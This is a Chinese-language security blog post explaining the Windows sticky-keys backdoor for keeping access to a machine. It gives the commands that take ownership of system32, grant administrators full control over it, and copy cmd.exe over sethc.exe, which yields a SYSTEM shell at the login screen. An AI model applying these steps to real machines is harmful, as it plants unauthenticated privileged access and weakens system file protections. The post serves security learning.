Windows之shift后门维持-Happy峰

Shift后门维持

Shift快捷键的介绍

Windows的粘滞键是 C:\windows\system32\sethc.exe 的程序，它本是为不方便按组合键的人设计的，

Windows系统按5下shift后，Windows就执行了system32下的sethc.exe，也就是启用了粘滞键

查看此程序的运行权限发现是当前用户

但是当我们未登陆系统(停留在登陆界面)的时候系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序

Shift后门原理

我们可以把cmd.exe这个程序更名称sethc.exe替换掉在登陆界面的时候我们连续按下5吃shift键系统以system权限就会运行我们的cmd.exe那么我们的cmd.exe就具有了管理员权限了

Shift后门制作

1、在命令行行执行以下命令，为复制cmd.exe为sethc.exe

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

但是会提示拒绝访问

2、需要更改文件权限，如下命令

takeown /f c:\windows\system32\*.*     /a /r /d y     注释：强制将当前目录下的所有文件及文件夹、子文件
夹下的所有者更改为管理员组(administrators)
cacls     c:\windows\system32\*.*     /T /E /G administrators:F     注释：在当前目录下的文件、子文件夹的
NTFS权限上添加管理员组(administrators)完全控制权限(并不删除原有所有NTFS权限设置)

3、执行后就可以进行【1】步骤的操作的，成功执行

4、在未登陆的情况下按下5次Shift

文章版权声明 1、本网站名称：Happy峰安全运营之路
2、本站永久网址：https://blog.chenjiangfeng.com
3、本站发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！
4、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长进行删除处理。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
7、根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途

本站所有内容（包括但不限于文字、图片、视频等）均受到版权法保护，归作者所有，未经授权不得转载、复制或用于其他任何商业目的。转载请注明出处，并保留原文链接。对于未经授权的使用，我们将保留追究法律责任的权利。

THE END